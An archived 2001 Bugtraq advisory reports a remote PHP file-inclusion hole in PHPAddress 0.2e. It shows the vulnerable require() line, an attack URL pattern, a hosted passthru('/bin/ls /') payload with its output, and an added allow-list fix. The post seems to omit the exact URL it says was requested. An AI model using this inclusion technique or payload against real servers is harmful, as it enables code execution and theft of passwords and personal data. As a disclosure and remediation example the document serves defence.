Bugtraq mailing list archives

PHP source injection in PHPAddress
From: "tim vandermeersch" <tim.vandermeersch () pandora be>
Date: Wed, 26 Dec 2001 05:19:11 +0100

PHP source injection in PHPAddress


PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
for maintaining a small web-based address-database. It can be found
at http://phpaddress.huebsch-gemacht.de/


Change the global.php3 file so it looks like this:
    <?php
    # (c) Copyright in 2000, 2001 by Chris Huebsch (chu () informatik tu-chemnitz de)
    $LangCookie = "";      // THIS LINE: clear any value supplied with the request
    if ($LangCookie)
      require("$LangCookie.php3");  // Line 5

Tested version

PHP Address 0.2e (09.12.2001)

The Problem

Any user who requests a URL like
"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
able to include any file he wants.


I put a PHP script on my server which I wanted to include:

    passthru("/bin/ls /");

Then I requested this URL:
(the .php3 is already there; look at line 5 in global.php3)

bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
usr var

Note that any PHP code could be included; malicious users could get access
to database passwords, personal information, ...

Tim Vandermeersch
Tim.Vandermeersch () pandora be
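
An added example, not part of the original post and not PHP-Address code: an allow-list alternative to building the require() path from a request value, which keeps language selection working instead of switching it off. The function name, language codes, file names and lang/ directory are assumptions made for illustration, and the code assumes PHP 7 or later.

```php
<?php
// Added example: allow-list replacement for require("$LangCookie.php3").
// All names below are hypothetical; they are not taken from PHP-Address.

const LANG_DIR     = __DIR__ . '/lang';            // assumed location of language files
const LANG_FILES   = ['en' => 'english.php3',      // assumed allow-list of languages
                      'de' => 'german.php3'];
const LANG_DEFAULT = 'en';

/**
 * Map an untrusted language value to a file on the allow-list.
 * The request value is only ever used as an array key, never as part of
 * a path, so URLs, "../" sequences, arrays and unknown names all fall
 * back to the default language.
 */
function resolve_language_file($requested): string
{
    $key = is_string($requested) ? strtolower(trim($requested)) : '';
    if (!array_key_exists($key, LANG_FILES)) {
        $key = LANG_DEFAULT;
    }
    return LANG_DIR . '/' . LANG_FILES[$key];
}

// In the application the value would be read from one named source rather
// than from a global that any request parameter can populate:
//   require resolve_language_file($_COOKIE['LangCookie'] ?? null);

// Constructed sample inputs: two valid choices, the advisory's placeholder,
// a URL-shaped value, a path-shaped value, an empty string and an array.
$samples = ['de', 'EN', 'INCLUDE_FILE', 'http://SERVER/INCLUDE_FILE', '../de', '', ['de']];
foreach ($samples as $s) {
    printf("%-32s -> %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        resolve_language_file($s));
}
```

Only the first two samples select a non-default file; every other input resolves to the default language file inside the fixed directory.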
